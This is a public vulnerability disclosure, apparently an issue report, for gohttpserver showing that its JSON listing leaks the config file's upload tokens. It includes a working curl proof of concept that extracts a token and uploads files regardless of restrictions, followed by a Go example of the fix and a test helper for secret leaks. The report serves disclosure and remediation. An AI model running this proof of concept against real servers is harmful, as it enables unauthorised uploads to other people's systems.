Disclaimer
As this project is unmaintained, I need to disclose this issue publicly.
It's used in the wild (I personally encountered it on a project I'm related to); here I just expose one discovered problem to prevent new users from running a vulnerable app.
Affected versions
Any, from 0 to 1.3.0
Steps to reproduce
Setup from docs:
cat > .ghs.yml << EOF
---
upload: false
delete: false
users:
  - email: "codeskyblue@codeskyblue.com"
    delete: true
    upload: true
    token: 4567gf8asydhf293r23r
EOF
docker run -it --rm -p 8000:8000 -v $PWD:/app/public --name gohttpserver codeskyblue/gohttpserver:latest --auth-type http --auth-http username1:password1
Actual behaviour
Now you can obtain the content of .ghs.yml with a simple curl:
curl username1:password1@localhost:8000/?json=true
{
  "auth": {
    "upload": false,
    "delete": false,
    "users": [
      {
        "Email": "codeskyblue@codeskyblue.com",
        "Upload": true,
        "Delete": true,
        "Token": "4567gf8asydhf293r23r"
      }
    ],
    "AccessTables": null
  },
  "files": [
    {
      "name": ".ghs.yml",
      "path": ".ghs.yml",
      "type": "file",
      "size": 138,
      "mtime": 1770109065474
    }
  ]
}
This effectively allows uploading anything, regardless of "upload: false", on a server protected by basic auth, because the per-user upload token is handed out in the listing response.
Simple POC:
echo "poc" > poc.txt
curl -F file=@poc.txt -F token=$(curl username1:password1@localhost:8000/?json=true | jq .auth.users[0].Token) http://username1:password1@localhost:8000/somedir
Unfortunately, this works the same way with no basic auth and token-restricted uploads (i.e. any publicly accessible server whose uploads are restricted by token effectively allows unrestricted uploads).
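The root cause is a familiar one: an internal configuration struct that holds secrets is serialised straight into an HTTP response. The capitalised keys in the leaked "users" entries ("Email", "Upload", "Delete", "Token") are what encoding/json produces for exported Go fields without json tags, which suggests the user record is marshalled as-is. The following Go program is an added example (not gohttpserver's source; the struct names and shapes are assumptions inferred from the response above, and the token and e-mail are constructed values) showing the untagged struct beside a hardened one that excludes the secret with `json:"-"`, plus a small check that can be run against any endpoint's body in an integration test so a regression fails CI instead of shipping.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// LeakyUser mirrors the shape implied by the leaked response: exported fields
// with no json tags, so every field, including Token, is serialised.
// (Assumed structure, not the project's source.)
type LeakyUser struct {
	Email  string
	Upload bool
	Delete bool
	Token  string
}

// SafeUser keeps the same data but excludes the secret from every JSON
// encoding via `json:"-"`; the remaining fields get explicit lowercase names.
type SafeUser struct {
	Email  string `json:"email"`
	Upload bool   `json:"upload"`
	Delete bool   `json:"delete"`
	Token  string `json:"-"`
}

// LeakyAuth / SafeAuth wrap the per-user records the way the "auth" object does.
type LeakyAuth struct {
	Upload bool        `json:"upload"`
	Delete bool        `json:"delete"`
	Users  []LeakyUser `json:"users"`
}

type SafeAuth struct {
	Upload bool       `json:"upload"`
	Delete bool       `json:"delete"`
	Users  []SafeUser `json:"users"`
}

// sampleToken is a constructed value standing in for a real per-user token.
const sampleToken = "CONSTRUCTED-TOKEN-0001"

// RenderLeaky produces the JSON a listing endpoint built on the untagged
// struct would send back: the token is included.
func RenderLeaky() (string, error) {
	a := LeakyAuth{Users: []LeakyUser{{Email: "user@example.com", Upload: true, Delete: true, Token: sampleToken}}}
	b, err := json.Marshal(a)
	return string(b), err
}

// RenderSafe produces the JSON for the same data using the tagged struct:
// the token never reaches the client.
func RenderSafe() (string, error) {
	a := SafeAuth{Users: []SafeUser{{Email: "user@example.com", Upload: true, Delete: true, Token: sampleToken}}}
	b, err := json.Marshal(a)
	return string(b), err
}

// LeakedSecrets returns every configured secret that appears verbatim in a
// response body. Feed it each endpoint's output in an integration test so a
// future refactor that drops the json:"-" tag is caught before release.
func LeakedSecrets(body string, secrets []string) []string {
	var leaked []string
	for _, s := range secrets {
		if s != "" && strings.Contains(body, s) {
			leaked = append(leaked, s)
		}
	}
	return leaked
}

func main() {
	leaky, _ := RenderLeaky()
	safe, _ := RenderSafe()
	fmt.Println("untagged struct:", leaky)
	fmt.Println("tagged struct:  ", safe)
	fmt.Println("secrets leaked by untagged struct:", LeakedSecrets(leaky, []string{sampleToken}))
	fmt.Println("secrets leaked by tagged struct:  ", LeakedSecrets(safe, []string{sampleToken}))
}
```

The tag-based fix is the cheapest one, but a more robust design is to never hand the configuration struct to the encoder at all: build a dedicated response type that only carries what the UI needs (the effective upload/delete flags for the current user), so adding a new secret field to the config later cannot silently leak.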